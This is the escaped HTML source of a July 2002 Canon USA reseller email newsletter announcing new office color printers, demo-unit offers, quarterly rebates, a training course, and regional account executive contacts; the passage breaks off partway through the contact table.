 &lt;table width="624" bgcolor="#000000" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="624" bgcolor="#ffffff"&gt;&lt;img src="/b.gif" width="1" height="8"&gt;&lt;br&gt;&lt;div align="center"&gt;&lt;img src="http://home.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10"&gt;&lt;/div&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#000000" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="624" bgcolor="#ffffff"&gt;&lt;font face="verdana, geneva" size="-2" color="#333333"&gt;&amp;nbsp;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;!-- date --&gt;
 July 18, 2002
 &lt;!-- /date --&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;!-- ### promo content ### --&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Canon USA Reseller News : July&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff" text="#000000" topmargin=0 leftmargin=0 marginheight="0" link="#000099" vlink="#000099"&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt; 
     &lt;td bgcolor="#ffffff"&gt;&lt;img src="http://www.captureleads.com/canon/leadblasts/nlimages/monthly_head_598.gif" width="598" height="70" alt="Canon USA Reseller News"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;tr bgcolor="#ffffff" align="right"&gt; 
     &lt;td bgcolor="#ffffff"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;i&gt;July 2002 / Volume 2 No. 5&lt;/i&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="0" align="center" &gt;
   &lt;tr&gt; 
     &lt;td width="10" valign="top" bgcolor="#d4dfff"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="180" valign="top" bgcolor="#d4dfff"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;br&gt;
       &lt;/font&gt; &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;font color="#ff0000"&gt;&lt;b&gt;&lt;font size="2"&gt;&lt;br&gt;
       The Canon USA Reseller News&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font size="2"&gt;provides resellers with monthly announcements&amp;nbsp;on Canon products that are purchased through national distributors.&lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;br&gt;
       &lt;br&gt;
       &lt;br&gt;
       &lt;/font&gt; &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt; &lt;br&gt;
       &lt;br&gt;
       &lt;/font&gt;&lt;/td&gt;
     &lt;td width="10" bgcolor="#d4dfff" valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top" width="10" bgcolor="#e2e2e2"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#e2e2e2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;br&gt;
       &lt;font size="2"&gt;Scan the following topics for &lt;b&gt;&lt;font color="#ff0000"&gt;"News You Can Use."&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;font size="2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt; 
       &lt;/font&gt;&lt;/font&gt; 
       &lt;ul&gt;
         &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt; 
         &lt;li type="square"&gt;&lt;font size="2"&gt;&lt;A href="#here"&gt;They're Here!&lt;/A&gt;&lt;br&gt;&lt;/font&gt; 
         &lt;li type="square"&gt;&lt;font size="2"&gt;&lt;A href="#check"&gt;Check Out Our Q3 Promotions&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
 		&lt;li type="square"&gt;&lt;font size="2"&gt;&lt;A href="#guess"&gt;Guess What's Coming to Distribution&lt;/A&gt;&lt;br&gt;&lt;/font&gt; 
         &lt;li type="square"&gt;&lt;font size="2"&gt;&lt;A href="#training"&gt;Web-based Training Addition / We Have a Winner&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
         &lt;li type="square"&gt;&lt;font size="2"&gt;&lt;A href="#reseller"&gt;Reseller Account Executive&lt;/A&gt;&lt;br&gt;&lt;/font&gt;&lt;/li&gt;&lt;/font&gt;
 		&lt;/ul&gt;
     &lt;/td&gt;
     &lt;td width="10" valign="top" bgcolor="#e2e2e2"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="5" align="center" bgcolor="#000000"&gt;
   &lt;tr bgcolor="#e2e2e2"&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td bgcolor="#e2e2e2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;&lt;a name="here"&gt;They're Here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#ffffff"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td bgcolor="#ffffff"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;Canon's N1000 and N2000 innovative Office Color Printers are here!  Orders are now being taken for these ... Super High Speed ... Super High Quality ... Large Volume printers!  With super low operating costs and excellent durability, these printers provide the solution to your customers' business color needs.&lt;br&gt;
 &lt;br&gt;Providing our resellers with the tools necessary to be successful in the marketplace is important to us.  In an effort to help you jump-start your N1000 printer sales, we are making available, on a first come first served basis, HALF-PRICE N1000 DEMO units.  For your convenience, these units can be purchased at  Ingram Micro, Tech Data or D&amp;H.  There is a limit of one half-price unit per reseller - and supplies are limited - so order today!&lt;br&gt;
 &lt;br&gt;To help you generate interest with your customers for the N1000/N2000, we have created a video banner ad that can be run on your website.  Log on to our  reseller website:  &lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6kxw3FhUCGLs-y39w-_lR"&gt;http://www.canonresellers.com&lt;/a&gt; to view the N1000/N2000 video banner ad.  You'll find the ad running on the Home Page.  To order a CD of this video banner ad for your use, contact your Canon Account Executive.
 &lt;/font&gt;&lt;/td&gt;
     &lt;td width="10" bgcolor="#ffffff"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="5" align="center" bgcolor="#000000"&gt;
   &lt;tr bgcolor="#e2e2e2"&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td bgcolor="#e2e2e2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;&lt;a name="check"&gt;Check Out Our Q3 Promotions&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="1" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr bgcolor="#d4dfff"&gt; 
     &lt;td width="150" bgcolor="#d4dfff" align="left"&gt;
       &lt;div align="left"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Product&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
     &lt;/td&gt;
     &lt;td align="middle" width="150"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Instant Rebate*&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td align="middle" width="127"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Timeframe&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="150"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;imageCLASS 1100&lt;/font&gt;&lt;/td&gt;
     &lt;td align="middle" width="150"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;$100&lt;/font&gt;&lt;/td&gt;
     &lt;td align="middle" width="127"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Through September 30, 2002&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="5" align="center" bgcolor="#000000"&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#ffffff"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td bgcolor="#ffffff"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;*All rebates will be reflected on the distributor invoice price &lt;b&gt;&lt;i&gt;at the time of purchase&lt;/i&gt;&lt;/b&gt;.&lt;br&gt;
       &lt;br&gt;&lt;b&gt;Quarterly Performance/Growth Bonus&lt;/b&gt;&lt;br&gt;
       &lt;br&gt;It's a new quarter and a fresh opportunity to become a Canon Premier Partner.  Our quarterly growth goals are within reach!  Your purchases of all eligible hardware* between July 1, 2002 and September 30, 2002 work toward your Premier Partner status.  Following are the rebate categories:
       &lt;br&gt;
 	  &lt;br&gt;
       $50,000-$99,000 = 4% rebate&lt;br&gt;
       $100,000+ = 6% rebate&lt;br&gt;
       &lt;br&gt;
       Claim forms for submitting your claims are available from your Canon reseller Account Executive and at &lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZAScfHiaSIKlsTn8N_Jj9R" target="_blank"&gt;www.canonresellers.com&lt;/a&gt;.&lt;br&gt;
       &lt;br&gt;
       &lt;font size="2"&gt;*Only hardware is eligible - DR-3060, DR-3080C, DR-5020, DR-5080C, DR-4580U, DR-4080U, N1000/N2000 Office Color Printers, imageCLASS 2200 and imageCLASS 1100.  CarePAKS, consumables, maintenance kits and media are not eligible.&lt;/font&gt;&lt;br&gt;
       &lt;br&gt;
       Click on  &lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfNZhIMQRNGWF8w6YrPhsR" target="_blank"&gt;www.canonresellers.com&lt;/a&gt;, to find your tools for success! 
       &lt;br&gt;
       &lt;/font&gt;&lt;/td&gt;
     &lt;td width="10" bgcolor="#ffffff"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="5" align="center" bgcolor="#000000"&gt;
   &lt;tr bgcolor="#e2e2e2"&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td bgcolor="#e2e2e2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;&lt;a name="guess"&gt;Guess What's Coming to Distribution&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#ffffff"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td bgcolor="#ffffff"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;
 Here's a clue:  Canon is known 'far and wide' for its products.  Coming soon&amp;#151;at a distributor near you - we'll show you just how 'wide' our products can be.  Watch for another clue in our August newsletter!&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10" bgcolor="#ffffff"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="5" align="center"&gt;
   &lt;tr bgcolor="#e2e2e2"&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td colspan="2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;&lt;a name="training"&gt;Web Based Training Addition / We Have a Winner&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;As promised, we're about to launch another web training course.  Final touches are being made on Canon's &lt;b&gt;N1000/N2000&lt;/b&gt; web training course.  This creative and informative course - covering topics that include  Features, Installation, Connectivity and Markets - is not to be missed.  Details to follow.&lt;br&gt;
       &lt;br&gt;
       We have a winner!  Congratulations to everyone who completed the imageCLASS 1100 web training before June 30!  The winning name was randomly selected from a 'hat' and we're pleased to announce the winner of the Canon PowerShot A20 digital camera works at one of our valued resellers in North Carolina!&lt;/font&gt;&lt;/td&gt;
     &lt;td align="right" valign="middle"&gt;&lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBf9Lq-NyhmFz_e0CvgpaFR"&gt;&lt;img src="http://www.captureleads.com/canon/leadblasts/nlimages/simon_anim.gif" width="173" height="173" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top" colspan="2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;Although the contest is over... the learning should not stop.  If you have not yet completed this informative imageCLASS 1100 training course, log on to &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KTQcIiTPDuYWD0V_Wy4R" target="_blank"&gt;http://www.canonresellers.com&lt;/a&gt; right click on Simon and go to the training site. &lt;br&gt;
         &lt;br&gt;
       &lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="5" align="center"&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#e2e2e2"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td colspan="2" bgcolor="#e2e2e2"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;a name="reseller"&gt;Reseller Account Executive&amp;#151;Contact Changes&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10" bgcolor="#e2e2e2"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td colspan="2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;Canon has a dedicated team of Account Executives whose mission is to work with you to achieve our mutual business goals.&lt;br&gt;
       &lt;br&gt;
       Check the list below and note the name and e-mail address of the Account Executive assigned to your state.  Be sure to contact your Account Executive for support with the following:
 &lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt; 
       &lt;ul&gt;
         &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt; 
         &lt;li type="square"&gt;N1000/N2000 Video Banner Ad&lt;br&gt;
         &lt;li type="square"&gt;Events (Open Houses/Shows)&lt;br&gt;
 		&lt;li type="square"&gt;Sales Support Collateral&lt;br&gt;
 		&lt;li type="square"&gt;Discounted Demo Units&lt;br&gt;
 &lt;/li&gt;&lt;/font&gt; 
       &lt;/ul&gt;
     &lt;/td&gt;
     &lt;td valign="top"&gt; 
       &lt;ul&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;
         &lt;li type="square"&gt;End User Sales Calls&lt;br&gt;
 		&lt;li type="square"&gt;Demand Generation&lt;br&gt;
 		&lt;li type="square"&gt;Product Training&lt;br&gt;
 		&lt;li type="square"&gt;Bids&lt;br&gt;
         &lt;/LI&gt;&lt;/font&gt;
       &lt;/ul&gt;
     &lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td colspan="2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;Account 
 		Executives are listed below with the states that they cover.&lt;br&gt;
       &lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Northeast&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;John 
       Brogan &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:jbrogan@cusa.canon.com" &gt;(jbrogan@cusa.canon.com)&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Connecticut&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Maine &lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;New Hampshire&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Rhode Island&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Massachusetts&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;New York&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;New Jersey&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Vermont&lt;/font&gt;&lt;/td&gt;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sans-serif"&gt;Mid Atlantic&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Greg Harzenski&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:gharzenski@cusa.canon.com" &gt;(gharzenski@cusa.canon.com)&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Delaware&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Maryland&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Washington D.C.&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;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sans-serif"&gt;Midwest&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Jennifer Mickeletto &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:zzzickeletto@cusa.canon.com" &gt;(zzzickeletto@cusa.canon.com)&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Indiana&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Kansas&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Missouri&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Ohio&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Colorado&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Kentucky&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Nebraska&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Tennessee&lt;/font&gt;&lt;/td&gt;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sans-serif"&gt;Mid North&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Chad Crump&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:ccrump@cusa.canon.com" &gt;(ccrump@cusa.canon.com)&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Alaska&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Illinois&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Minnesota&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Washington&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Idaho&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Montana&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;North Dakota&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Wisconsin&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Iowa&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Michigan&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;South Dakota&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Wyoming&lt;/font&gt;&lt;/td&gt;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valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;South&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Randal Kendrix &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:rkendrix@cusa.canon.com" &gt;(rkendrix@cusa.canon.com)&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Arkansas&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Mississippi&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Oklahoma&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Utah&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Louisiana&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;New Mexico&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Texas&lt;/font&gt;&lt;/td&gt;
